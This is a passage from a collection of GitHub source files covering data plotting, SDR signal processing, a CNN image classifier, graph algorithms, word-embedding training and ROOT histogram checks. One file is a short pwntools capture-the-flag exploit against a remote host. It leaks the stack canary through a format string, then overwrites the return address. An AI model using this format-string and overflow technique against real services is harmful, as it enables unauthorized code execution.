only numeric columns for correlation heatmap\nnumeric_cols = df.select_dtypes(include=['float64', 'int64'])\nplt.figure(figsize=(10, 8))\nsns.heatmap(numeric_cols.corr(), annot=True, cmap='coolwarm')\nplt.show()\n","repo_name":"nogibjj/levia_colab_week9","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29969431714","text":"#!/usr/bin/env python\n# vim: set ts=4 sw=4 tw=0 et pm=:\nimport sys\nimport math\nimport numpy\nimport os.path\nimport re\nimport getopt\nimport time\nfrom functools import partial\nimport matplotlib.pyplot as plt\nimport threading\nimport time\n\ndef normalize(v):\n m = max(v)\n return [x/m for x in v]\n\nclass PeakHold(object):\n def __init__(self, fft_size, use_8bit=False, verbose=False):\n self._slice_size=fft_size\n self._fft_size=self._slice_size\n\n if use_8bit:\n self._struct_elem = numpy.uint8\n self._struct_len = numpy.dtype(self._struct_elem).itemsize * self._slice_size *2\n else:\n self._struct_elem = numpy.complex64\n self._struct_len = numpy.dtype(self._struct_elem).itemsize * self._slice_size\n\n self._window = numpy.blackman(self._fft_size)\n self.peaks = numpy.array([-100000000]*self._fft_size)\n\n def _fft(self, slice, fft_len=None):\n if fft_len:\n fft_result = numpy.fft.fft(slice, fft_len)\n else:\n fft_result = numpy.fft.fft(slice)\n\n fft_result = numpy.fft.fftshift(fft_result)\n return fft_result/len(slice)\n\n\n def process_file(self, file_name):\n with open(file_name, \"rb\") as f:\n f.read(self._struct_len)\n while True:\n data = f.read(self._struct_len)\n if not data: break\n if len(data) != self._struct_len: break\n\n slice = numpy.frombuffer(data, dtype=self._struct_elem)\n if self._struct_elem == numpy.uint8:\n slice = slice.astype(numpy.float32) # convert to float\n slice = (slice-127.35)/128. 
# Normalize\n slice = slice.view(numpy.complex64) # reinterpret as complex\n \n spectrum = self._fft(slice, self._fft_size)\n mag = spectrum\n mag = numpy.abs(spectrum)**2\n #print max(numpy.abs(slice)), max(mag)\n mag = 10*numpy.log10(mag)\n self.peaks = numpy.maximum(self.peaks, mag)\n\ndef plot_peaks(data):\n plt.ion()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_ylim([-80,-20])\n time.sleep(1)\n l, = ax.plot(data.peaks, )\n while 1:\n l.set_ydata(data.peaks)\n fig.canvas.draw()\n time.sleep(1)\n \nif __name__ == \"__main__\":\n fft_size = int(sys.argv[1])\n verbose = False\n file_name = \"/dev/stdin\"\n d = PeakHold(fft_size=fft_size, use_8bit=False, verbose=verbose)\n drawer = threading.Thread(target=plot_peaks, args=[d])\n drawer.setDaemon(True)\n drawer.start()\n\n d.process_file(file_name)\n while True:\n time.sleep(1)\n\n","repo_name":"muccc/iridium-toolkit","sub_path":"rtl-sdr/rtl-peak-hold.py","file_name":"rtl-peak-hold.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":438,"dataset":"github-code","pt":"68"} +{"seq_id":"36473746808","text":"### Export only\n### Exports the current Streams7 video as TIFF files\n### Author: Emmett Krupczak using code borrowed from Levi (\"SPythonTestMultiCamsStartTimeScript\")\n### 14 Jun 2017\n\nimport SPython\n\nexportPath = \"C:\\\\StreamsExportTest2\\\\VideoExportTest\\\\\"\n\ndef groupDevices():\n \"\"\"\n From Levi's code.\n Get the handle for all devices in the system.\n The 0, 0 means we are not looking for a device in any\n particular movie or scene. Just devices in the main\n Streams device list. Each new video device will be\n added to a video device list. \n \n Returns this video device list\n \"\"\"\n vidDevList = [] # make an empty list\n GPSDev = 0\n hDev = sFindFirstDevice(0, 0)\n while hDev:\n curType = sGetDeviceDataType(hDev, 0)\n devName = sGetName(hDev)\n if curType == tdVIDEO:\n vidDevList.append(hDev)\n print('Found video device ' + devName)\n if curType == tdGPS:\n GPSDev = hDev\n print('Found GPS device ' + devName)\n hDev = sFindNextDevice()\n\n # Select all the video devices found above.\n sdErr = sSelectDevice(vidDevList[0], 1)\n for i in range(1, len(vidDevList)):\n sdErr = sSelectDevice(vidDevList[i], 0)\n\n # print all video devices selected\n for i in range(0, len(vidDevList)):\n if sIsDeviceSelected(vidDevList[i]):\n print('Device ' + sGetName(vidDevList[i]) + ' selected for video')\n\n # Group all selected devices\n gsdErr = sGroupSelectedDevices('VideoGroup')\n return vidDevList\n\ndef getActive(verbose = True):\n \"\"\"\n verbose = True: Prints active movie and scene name\n returns movie name, scene name\n \"\"\"\n activeScene = sGetActiveScene()\n activeMovie = sGetActiveMovie()\n if verbose: \n print(\"Scene: \"+sGetSceneName(activeScene))\n print(\"Movie: \"+ sGetMovieName(activeMovie))\n return sGetMovieName(activeMovie), sGetSceneName(activeScene)\n\ndef exportScene(vidDevList, exportPath, fileType = \"TIFF\"):\n \"\"\"\n From Levi's code.\n Exports current scene as TIFF files to location given by exportPath\n \"\"\"\n hExport = sFindInstalledFilterByName(ftFILE, fileType)\n\n # make a word with flags for exporting. This is done by\n # XORing the various desired flags together. 
In this\n # case there will be a new file for each frame, and the\n # export progress meter will show.\n exportFlags = EXPORT_SEPARATE_FILES_PER_FRAME | EXPORT_SHOW_PROGRESS_METER\n\n expMovieName, expSceneName = getActive(verbose = False)\n print('Start Export: ' + sGetTimeString(sGetCurrentTime()))\n for i in range(0, len(vidDevList)):\n expDevName = sGetName(vidDevList[i])\n expFName = exportPath + expMovieName + '_' + expSceneName + '_' + expDevName + '_'\n print(expFName)\n eErr = sExport([vidDevList[i]], hExport, expFName, xmENTIRE_SCENE, exportFlags)\n print('End Export: ' + sGetTimeString(sGetCurrentTime()))\n\ndef main():\n print(\"Running video export test script.\")\n vidDevList = groupDevices()\n print(\"Devices identified and grouped\")\n getActive()\n exportScene(vidDevList, exportPath)\n\nif __name__ == \"__main__\":\n main()","repo_name":"emmettk/pvrsex","sub_path":"VideoExportTest.py","file_name":"VideoExportTest.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19945149344","text":"from math import sqrt\n\ndef check_prime(a):\n if a < 2:\n return 0\n for i in range(2, int(sqrt(a))+1):\n if a % i == 0:\n return 0\n return 1\n\n_ =input()\na = map(int, input().split())\ncnt = 0\nfor i in a:\n if check_prime(i) == 1:\n cnt += 1\nprint(cnt)","repo_name":"jj150618/Algorithm","sub_path":"Python/백준/단계별 풀어보기/8.기본 수학 2/1978_소수 찾기.py","file_name":"1978_소수 찾기.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74293251095","text":"#!/usr/bin/python3\n\nimport string\n\nfile = 'code/romeo-full.txt'\ntry:\n fd = open(file)\nexcept:\n print('There is not such a file %s.' 
% (file))\n exit()\n\nDict = dict()\nfor line in fd:\n line = line.lower()\n for letter in line:\n if not letter.isalpha() : continue\n Dict[letter] = Dict.get(letter, 0) + 1\n\nlst = list()\nfor key, val in Dict.items():\n lst.append(( val, key ))\n\nlst.sort(reverse=True)\n\nfor val, key in lst:\n print('%s: %s' % (key, val))\n\nfd.close()\n","repo_name":"iliyahoo/pythonlearn","sub_path":"10-3.py","file_name":"10-3.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39495636255","text":"import setuptools\n\nwith open(\"README.md\", 'rt') as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"db-join\",\n version=\"0.1.8\",\n author=\"Frey Waid\",\n author_email=\"logophage1@gmail.com\",\n description=\"NoSQL db join\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license=\"MIT license\",\n url=\"https://github.com/freywaid/db-join\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n install_requires=['dotted-notation>=0.6.0',],\n)\n","repo_name":"freywaid/db-join","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"757113096","text":"from pwn import *\ncontext.log_level='debug'\nio=process('./binary_200')\nio=remote('172.104.78.53',22002)\n# elf=ELF('./binary_200')\npay='%15$p'\nio.sendline(pay)\nio.recv(2)\ncanary=int(io.recv(8),16)\npay='a'*0x28+p32(canary)+'a'*8+p32(0)+p32(0x0804854d)\nio.sendline(pay)\nio.interactive()","repo_name":"ilovekeer/Buuoj-Pwn","sub_path":"qwb2019/day18/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"68"} +{"seq_id":"24857748334","text":"import heapq\n\ndef get_prim_mst(graph):\n # for a connected component\n # assume nodes labeled 0 to n - 1\n max_value = 1000000000000 # some large number\n mst = []\n start_vertex = list(graph.keys())[0]\n spinned_vertices = set([start_vertex])\n weights = [max_value for el in graph]\n weights[start_vertex] = 0\n parents = [None for el in graph]\n for (vertex, weight) in graph[start_vertex]:\n weights[vertex] = weight\n parents[vertex] = start_vertex\n vertices_heap = [(weight, vertex) for (vertex, weight) in graph[start_vertex]]\n heapq.heapify(vertices_heap)\n while len(spinned_vertices) < len(graph):\n (weight, new_vertex) = heapq.heappop(vertices_heap)\n # can have multiple instances for one vertex in the heap => need to do the check\n while new_vertex in spinned_vertices:\n weight, new_vertex = heapq.heappop(vertices_heap)\n spinned_vertices.add(new_vertex)\n mst.append(((parents[new_vertex], new_vertex), weight))\n for (v, w) in graph[new_vertex]:\n if v not in spinned_vertices:\n if w < weights[v]:\n weights[v] = w\n parents[v] = new_vertex\n heapq.heappush(vertices_heap, (w, v))\n return mst\n\ndef test_get_prim_mst():\n graph = {0: [(1, 1), (2, 8), (3, 2)],\n 1: [(4, 6)],\n 2: [(4, 1)],\n 3: [(2, 3)],\n 4:[]}\n assert get_prim_mst(graph) == [((0, 1), 1), ((0, 3), 2), ((3, 2), 3), ((2, 4), 1)]\n graph1 = {0:[(1, 5), (3, 1)],\n 1: [(0, 5), (3, 2), (2, 6)],\n 2: [(1, 6), (3, 10), (4, 7)],\n 3: [(0, 1), (1, 2), (2, 10), (4, 2)],\n 4: [(2, 
7), (3, 2)]}\n assert get_prim_mst(graph1) == [((0, 3), 1), ((3, 1), 2), ((3, 4), 2), ((1, 2), 6)]\n\nif __name__ == \"__main__\":\n test_get_prim_mst()\n","repo_name":"MarinaSergeeva/Algorithms","sub_path":"day21_prim_mst.py","file_name":"day21_prim_mst.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13811900987","text":"# importing tensorflow for using CNN and ImageDataGenerator class from keras for preprocessing input data\r\nimport tensorflow as tf\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\n# preprocessing training data by augmanting data(for avoiding overfiting) and loading the train data in batche of 32 images\r\n\r\ntrain_datagen=ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True\r\n)\r\ntrain_set=train_datagen.flow_from_directory(\r\n 'Section 40 - Convolutional Neural Networks (CNN)/dataset/training_set',\r\n target_size=(64,64),\r\n batch_size=32,\r\n class_mode='binary'\r\n)\r\n\r\n# preprocessing test data by augmanting data(for avoiding overfiting) and loading the test data in batches of 32 images\r\ntest_datagen=ImageDataGenerator(\r\n rescale=1./255)\r\ntest_set=test_datagen.flow_from_directory(\r\n 'Section 40 - Convolutional Neural Networks (CNN)/dataset/test_set'\r\n ,target_size=(64,64),\r\n batch_size=32,\r\n class_mode='binary'\r\n)\r\n\r\n\r\n# initializing convolution neural network object\r\ncnn=tf.keras.models.Sequential()\r\n\r\n# convolution layer\r\ncnn.add(tf.keras.layers.Conv2D(filters=32,kernel_size=3,activation='relu',input_shape=[64,64,3]))\r\n\r\n# pooling layer\r\ncnn.add(tf.keras.layers.MaxPool2D(pool_size=2,strides=2))\r\n\r\n# adding second convolution and pooling layer\r\ncnn.add(tf.keras.layers.Conv2D(filters=32,kernel_size=3,activation='relu'))\r\ncnn.add(tf.keras.layers.MaxPool2D(pool_size=2,strides=2))\r\n\r\n#flattening the poolmap\r\ncnn.add(tf.keras.layers.Flatten())\r\n\r\n# adding full connection layer\r\ncnn.add(tf.keras.layers.Dense(units=128,activation='relu'))\r\n\r\n#adding ouput layer\r\ncnn.add(tf.keras.layers.Dense(units=1,activation='sigmoid'))\r\n\r\n#compiling the cnn (brain)\r\ncnn.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\r\n\r\n#training on train_set\r\ncnn.fit(x=train_set,validation_data=test_set,epochs=2)\r\n\r\n# making a single prediction\r\nimport numpy as np\r\nfrom keras.preprocessing import image\r\ntest_image=image.load_img('Section 40 - Convolutional Neural Networks (CNN)/dataset/test_set/cats/cat.4937.jpg',target_size=(64,64))\r\n# as input is taken in form of array so convert image to array\r\ntest_image=image.img_to_array(test_image)\r\n# as input is taken in batch of 32 so expand the array\r\ntest_image=np.expand_dims(test_image,axis=0)\r\nresult=cnn.predict(test_image)\r\ntrain_set.class_indices\r\nif result[0][0]==1:\r\n prediction='dog'\r\nelse :\r\n prediction='cat'\r\nprint(prediction)\r\n","repo_name":"Manishk2511/ImageClassifierCNN","sub_path":"code/dogORcatCNN.py","file_name":"dogORcatCNN.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"11486299142","text":"class naipe:\n\tdef __init__(self, palo, numero, emoji, t_posicion, e_valor):\n\t\tself.palo = palo\n\t\tself.numero = numero\n\t\tself.emoji = emoji\n\t\tself.t_posicion = t_posicion\n\t\tself.e_valor = e_valor\n\nespada_1 = 
naipe(\"Espada\", 1, \"espada1\", 1, 1)\nbasto_1 = naipe(\"Basto\", 1, \"basto1\", 2, 1)\nespada_7 = naipe(\"Espada\", 7, \"espada7\", 3, 7)\noro_7 = naipe(\"Oro\", 7, \"oro7\", 4, 7)\nespada_3 = naipe(\"Espada\", 3, \"espada3\", 5, 3)\nbasto_3 = naipe(\"Basto\", 3, \"basto3\", 5, 3)\noro_3 = naipe(\"Oro\", 3, \"oro3\", 5, 3)\ncopa_3 = naipe(\"Copa\", 3, \"copa3\", 5, 3)\nespada_2 = naipe(\"Espada\", 2, \"espada2\", 6, 2)\nbasto_2 = naipe(\"Basto\", 2, \"basto2\", 6, 2)\noro_2 = naipe(\"Oro\", 2, \"oro2\", 6, 2)\ncopa_2 = naipe(\"Copa\", 2, \"copa2\", 6, 2)\noro_1 = naipe(\"Oro\", 1, \"oro1\", 7, 1)\ncopa_1 = naipe(\"Copa\", 1, \"copa1\", 7, 1)\nespada_rey = naipe(\"Espada\", 12, \"espadarey\", 8, 10)\nbasto_rey = naipe(\"Basto\", 12, \"bastorey\", 8, 10)\noro_rey = naipe(\"Oro\", 12, \"ororey\", 8, 10)\ncopa_rey = naipe(\"Copa\", 12, \"coparey\", 8, 10)\nespada_caballo = naipe(\"Espada\", 11, \"espadacaballo\", 9, 9)\nbasto_caballo = naipe(\"Basto\", 11, \"bastocaballo\", 9, 9)\noro_caballo = naipe(\"Oro\", 11, \"orocaballo\", 9, 9)\ncopa_caballo = naipe(\"Copa\", 11, \"copacaballo\", 9, 9)\nespada_sota = naipe(\"Espada\", 10, \"espadasota\", 10, 8)\nbasto_sota = naipe(\"Basto\", 10, \"bastosota\", 10, 8)\noro_sota = naipe(\"Oro\", 10, \"orosota\", 10, 8)\ncopa_sota = naipe(\"Copa\", 10, \"copasota\", 10, 8)\nbasto_7 = naipe(\"Basto\", 7, \"basto7\", 11, 7)\ncopa_7 = naipe(\"Copa\", 7, \"copa7\", 11, 7)\nespada_6 = naipe(\"Espada\", 6, \"espada6\", 12, 6)\nbasto_6 = naipe(\"Basto\", 6, \"basto6\", 12, 6)\noro_6 = naipe(\"Oro\", 6, \"oro6\", 12, 6)\ncopa_6 = naipe(\"Copa\", 6, \"copa6\", 12, 6)\nespada_5 = naipe(\"Espada\", 5, \"espada5\", 13, 5)\nbasto_5 = naipe(\"Basto\", 5, \"basto5\", 13, 5)\noro_5 = naipe(\"Oro\", 5, \"oro5\", 13, 5)\ncopa_5 = naipe(\"Copa\", 5, \"copa5\", 13, 5)\nespada_4 = naipe(\"Espada\", 4, \"espada4\", 14, 4)\nbasto_4 = naipe(\"Basto\", 4, \"basto4\", 14, 4)\noro_4 = naipe(\"Oro\", 4, \"oro4\", 14, 4)\ncopa_4 = naipe(\"Copa\", 4, \"copa4\", 14, 4)\n\nbaraja = [espada_1, espada_2, espada_3, espada_4, espada_5, espada_6, espada_7, espada_sota, espada_caballo, espada_rey,\n\t\t\toro_1, oro_2, oro_3, oro_4, oro_5, oro_6, oro_7, oro_sota, oro_caballo, oro_rey,\n\t\t\tbasto_1, basto_2, basto_3, basto_4, basto_5, basto_6, basto_7, basto_sota, basto_caballo, basto_rey,\n\t\t\tcopa_1, copa_2, copa_3, copa_4, copa_5, copa_6, copa_7, copa_sota, copa_caballo, copa_rey]\nusadas = []","repo_name":"franagustin/bori-ghost","sub_path":"comandos/cartas_objetos.py","file_name":"cartas_objetos.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32468003192","text":"def observed():\n observations = []\n for i in range(7):\n observation = input(f\"Enter observation {i+1}: \")\n observations.append(observation)\n return observations\n\ndef run():\n print(\"Counting observations...\")\n observations_list = observed()\n observations_set = set((obs, observations_list.count(obs)) for obs in set(observations_list))\n print(observations_set)\nrun()","repo_name":"LucaBaldassano/QHO426","sub_path":"data/sets/set_from_list.py","file_name":"set_from_list.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27448277574","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Importation des données\n\n# In[1]:\n\n\nimport os\nimport string\nimport re\nimport math\nimport statistics\nfrom math 
import sqrt\nimport numpy as np\nimport random\nimport time\nimport pandas as pd\nimport nltk, re, pprint\n#nltk.download('punkt')\nfrom nltk import word_tokenize\nrandom.seed(1)\nnp.random.seed(1)\nimport matplotlib.pyplot as plt\nfrom IPython.display import clear_output\nfrom matplotlib import pyplot as plt\nimport collections\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.autograd as autograd\n\nimport pickle\n\n#os.chdir('C:/Users/torna/Documents/StatApp/StatApp')\nos.chdir('/Users/alainquartierlatente/Desktop/Ensae/StatApp')\n#os.chdir('/home/aqlt/Documents/Ensae/StatApp')\n#os.chdir('C:/Users/Kim Antunez/Documents/Projets_autres/StatApp')\nnom_dossier = \"100k\"\n#nom_dossier = \"ens\" #ou\n\n\n# On ne garde ici que les 100 000 premiers tweets\n\n# In[2]:\n\n\n# Penser à changer selon taille\nwith open(\"data/%s/vocabulary.file\" %nom_dossier, \"rb\") as f:\n taille_vocab = len(pickle.load(f))\n\n\n# In[3]:\n\n\n# Fonction pour mettre à jour le graphique en direct\ndef live_plot(data, figsize=(7,5), title=''):\n clear_output(wait=True)\n plt.figure(figsize=figsize)\n plt.plot(data)\n plt.title(title)\n plt.grid(True)\n plt.xlabel('epoch')\n plt.show();\n\n\n# # Lancement du modèle\n# Paramètres fixés : la dimension, le nombre de mots tirés dans le *negative sampling* et la proba utilisé, l'affichage du graphique\n\n# In[9]:\n\n\nif nom_dossier == \"ens\":\n dim = 50\nelse:\n dim = 20\nplot = True\nepoch = 10\n\n\n# Paramètres à modifier :\n\n# In[13]:\n\n\nlearning_rate = 0.02\nwindow = 4\nnumero_simulation = 13\n\n\n# In[ ]:\n\n\nseed = 1\n# On crée le dossier Simulation_{numero_simulation}\nif not os.path.exists(\"data/%s/Simulation_%i_seed%i\" %(nom_dossier, numero_simulation, seed)):\n os.mkdir(\"data/%s/Simulation_%i_seed%i\" %(nom_dossier, numero_simulation, seed))\nelse:\n print(\"Attention : le dossier Simulation_%i_seed%i existe déjà\" %(numero_simulation, seed))\n\ntorch.manual_seed(seed)\ninput = torch.randn(taille_vocab, dim)\noutput = torch.randn(taille_vocab, dim)\ninput = autograd.Variable(input, requires_grad=True)\noutput = autograd.Variable(output, requires_grad=True)\n\nloss_tot = []\ntemps_par_epoch = []\n\nstart = time.time()\nfor i in range(epoch):\n loss_val = 0\n start_epoch = time.time()\n \n print(\"Simulation %i - Lecture du fichier data/%s/window_%i/epoch_%i.file\" %(numero_simulation,nom_dossier, window, i))\n with open(\"data/%s/window_%i/epoch_%i.file\" % (nom_dossier, window, i), \"rb\") as f:\n test_sample = pickle.load(f)\n\n for focus, context, neg_sample in test_sample:\n data = torch.matmul(input[focus,], torch.t(output[context,]))\n loss1 = - F.logsigmoid(data)\n\n data = torch.matmul(input[focus,], torch.t(output[neg_sample,]))\n loss2 = - F.logsigmoid(-data).sum()\n loss_val += loss1 + loss2\n # Pour ensuite dériver les matrices par rapport à la loss\n (loss1+loss2).backward()\n\n # Il faut modifier juste le .data pour ne pas perdre la structure\n input.data = input.data - learning_rate * input.grad.data\n output.data = output.data - learning_rate * output.grad.data\n\n input.grad.data.zero_()\n output.grad.data.zero_()\n \n with open(\"data/%s/Simulation_%i_seed%i/input_%i.file\" %(nom_dossier, numero_simulation, seed, (len(loss_tot)+1)), \"wb\") as f:\n pickle.dump(input, f, pickle.HIGHEST_PROTOCOL)\n with open(\"data/%s/Simulation_%i_seed%i/output_%i.file\" %(nom_dossier, numero_simulation, seed, (len(loss_tot)+1)), 
\"wb\") as f:\n pickle.dump(output, f, pickle.HIGHEST_PROTOCOL)\n with open(\"data/%s/Simulation_%i_seed%i/loss.file\" %(nom_dossier, numero_simulation, seed), \"wb\") as f:\n pickle.dump(loss_tot, f, pickle.HIGHEST_PROTOCOL)\n with open(\"data/%s/Simulation_%i_seed%i/temps_par_epoch.file\" %(nom_dossier, numero_simulation, seed), \"wb\") as f:\n pickle.dump(temps_par_epoch, f, pickle.HIGHEST_PROTOCOL)\n \n end_epoch = time.time()\n temps_par_epoch.append(end_epoch - start_epoch)\n loss_val = loss_val / taille_vocab\n loss_tot.append(loss_val)\n if plot:\n live_plot(loss_tot)\n print(round((end_epoch - start_epoch)/60, 2))\nend = time.time()\nprint(round((end - start)/60, 2))\nprint(statistics.mean(temps_par_epoch)/60)\n\n\n# In[27]:\n\n\nnb_tweets = 100000\nwith open('data/%ik/Simulation_%ibis2/input' % int(nb_tweets/1000) + \n \"\" %numero_simulation +\n \"_1.file\", \"rb\") as f:\n input2 = pickle.load(f)\nwith open('data/%ik/' % int(nb_tweets/1000) +\n \"Simulation_%ibis2/output\" %numero_simulation + \n \"_1.file\", \"rb\") as f:\n output2 = pickle.load(f)\nwith open('data/%ik/' % int(nb_tweets/1000) + \n \"Simulation_%i/input\" %numero_simulation +\n \"_1.file\", \"rb\") as f:\n input = pickle.load(f)\nwith open('data/%ik/' % int(nb_tweets/1000) +\n \"Simulation_%i/output\" %numero_simulation + \n \"_1.file\", \"rb\") as f:\n output = pickle.load(f)\nprint(torch.all(torch.eq(input, input2)))\n\n\n# In[12]:\n\n\ntorch.manual_seed(1)\ninput = torch.randn(taille_vocab, dim)\ntorch.manual_seed(1)\ninput2 = torch.randn(taille_vocab, dim)\nprint(torch.all(torch.eq(input, input2)))\n\n\n# In[10]:\n\n\ndim\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ARKEnsae/TweetEmbedding","sub_path":"Code/Format py/2A - Lancement_modele_100k.py","file_name":"2A - Lancement_modele_100k.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"68"} +{"seq_id":"15024421050","text":"import numpy as np\n\n\ndef load_flow(path):\n with open(path, 'rb') as f:\n magic = float(np.fromfile(f, np.float32, count = 1)[0])\n if magic == 202021.25:\n w, h = np.fromfile(f, np.int32, count = 1)[0], np.fromfile(f, np.int32, count = 1)[0]\n data = np.fromfile(f, np.float32, count = h*w*2)\n data.resize((h, w, 2))\n return data\n return None\n\n\ndef save_flow(path, flow):\n magic = np.array([202021.25], np.float32)\n h, w = flow.shape[:2]\n h, w = np.array([h], np.int32), np.array([w], np.int32)\n\n with open(path, 'wb') as f:\n magic.tofile(f)\n w.tofile(f)\n h.tofile(f)\n flow.tofile(f)\n","repo_name":"ckxy/castty","sub_path":"castty/utils/flow_tools.py","file_name":"flow_tools.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"26649256176","text":"#defining rules\ndef get_rules():\n rules = {\"Numbers\":{\n \"zero\": 0,\n \"one\" : 1,\n \"two\": 2,\n \"three\": 3,\n \"four\": 4,\n \"five\": 5,\n \"six\": 6,\n \"seven\": 7,\n \"eight\": 8,\n \"nine\": 9,\n \"ten\": 10,\n \"twenty\": 20,\n \"thirty\": 30,\n \"forty\": 40,\n \"fifty\": 50,\n \"sixty\": 60,\n \"seventy\": 70,\n \"eighty\": 80,\n \"ninety\": 90,\n \"hundred\": 100\n },\n \"Tuples\": {\n \"single\":1,\n \"double\":2,\n \"triple\":3,\n \"quadruple\":4,\n \"quintuple\":5,\n \"sextuple\":6,\n \"septuple\":7,\n \"octuple\":8,\n \"nonuple\":9,\n \"decuple\":10\n },\n \"General\": {\n \"C M\": \"CM\",\n \"P M\": \"PM\",\n \"D M\": \"DM\",\n \"A M\": \"AM\"\n }\n }\n return rules\n\n#checking 
if word has comma at front or at last or at both if true then return front,word and last \ndef check_front_last(word):\n front=\"\"\n last=\"\"\n if(len(word)>1):\n if word[-1]==',' or word[-1]=='.':\n last=word[-1]\n word=word[:-1]\n if word[0]==',' or word[0]=='.':\n front=word[0]\n word=word[1:]\n return front,word,last\n\n\n#class for conversion\nclass SpokenToWritten:\n\n def __init__(self):\n\n self.rules=get_rules()\n self.paragraph=\"\"\n self.ouptut_para=\"\"\n\n #getting user input\n def get_user_input(self):\n\n self.paragraph=input(\"\\n[IN]:Enter Your paragraph of spoken english:\\n\\t\")\n\n if not self.paragraph:\n raise ValueError(\"[Error]: You entered nothing.\")\n\n #getting user output\n def show_output(self):\n print(\"\\n[OUT]:The input Spoken English Paragraph: \\n\\n \\\" \"+ self.paragraph+\"\\\"\")\n print(\"\\nConverted Written English Paragraph: \\n\\n \\\"\" +self.ouptut_para+\"\\\"\")\n\n \n #main conversion function of spoken to written english \n def Convert(self):\n #splitting paragraph into individual words\n words_of_para=self.paragraph.split()\n\n #accessing defines rules\n numbers=self.rules['Numbers']\n tuples=self.rules['Tuples']\n general=self.rules['General']\n i=0\n no_of_words=len(words_of_para)\n #loop will run for the number of words in paragraph \n while i 5 and any(folder in split_path for folder in (folder_list)): \n elif len(split_path) > 5 and any(folder in split_path for folder in (folder_list)): \n \n\t\t# We are greater than 3 directories deep and these directories include the specified folders above, goo deeper\n f_path,chi2_dict,n_th1,n_th2,n_tp,errors = validate_uw_hists(input,file1, file2,f_path,chi2_dict,n_th1,n_th2,n_tp,errors) \n\n \n # If the length is shorter than the specified number, than we need to continue the loop\n else:\n pass\n \n # Record the file_path that will result now that we are done with the current folder level\n # i.e. 
the folder path that results from going up a level in the directory\n f_path = f_path.split('/')\n f_path = '/'.join(f_path[:-1])\n \n elif issubclass(type(input), ROOT.TProfile):\n # This is a TProfile \n\n # Increment the number of TProfiles variable n_tp\n n_tp += 1 \n \n # Record the path of the directory we are looking in with the name of the hist file as part of the path\n try:\n f_path_tp = f_path + '/' + input.GetName() \n except:\n print(\"can't get f_path_tp\")\n \n # Format f_path_tp\n try:\n # Get the part of f_path that follows the ':'\n f_path_tp = f_path_tp.split(':')\n f_path_tp = f_path_tp[1][1:]\n except:\n print(\"can't format f_path_tp\")\n \n \n # Calculate the chi2 values and store them in chi2_dict\n try:\n # Calculate the chi2 value between file1's and file2's filename:f_name\n chi2ndf_val = file1.Get(f_path_tp).Chi2Test(file2.Get(f_path_tp),'CHI2/NDF')\n chi2_dict['f_name'].append(f_path_tp)\n chi2_dict['f_type'].append('TProfile')\n chi2_dict['chi2ndf_vals'].append(chi2ndf_val)\n print('chi2success')\n except: \n errors +=1\n print(f'chi2_tp error on filepath: {f_path_tp}')\n\n \n elif issubclass(type(input),ROOT.TH2):\t \n # This is a TH2 histogram\n\n # Increment the number of TH2s in variable n_th2\n n_th2 += 1 \n\n # Record the path of the directory we are looking in with the name of the hist file as part of the path\n try:\n f_path_th2 = f_path + '/' + input.GetName() \n except:\n print(\"can't get f_path_th2\")\n \n # Format f_path_th2 \n try:\n\t # Get the part of f_path that follows the ':'\n f_path_th2 = f_path_th2.split(':')\n f_path_th2 = f_path_th2[1][1:]\n except:\n print(\"can't format f_path_th2\")\n \n\t # Calculate the chi2 values and store them in chi2_dict\n try:\n # Calculate the chi2 value between file1's and file2's filename:f_name\n chi2ndf_val = file1.Get(f_path_th2).Chi2Test(file2.Get(f_path_th2),'CHI2/NDF')\n chi2_dict['f_name'].append(f_path_th2)\n chi2_dict['f_type'].append('TH2')\n chi2_dict['chi2ndf_vals'].append(chi2ndf_val)\n except: \n errors +=1\n print(f'chi2_th2 error on filepath: {f_path_th2}')\n \n \n elif issubclass(type(input),ROOT.TH1): \n # This is a TH1 histogram\n\n # Increment the number of TH1s in variable n_th1\n n_th1 += 1\n \n # Record the path of the directory we are looking in with the 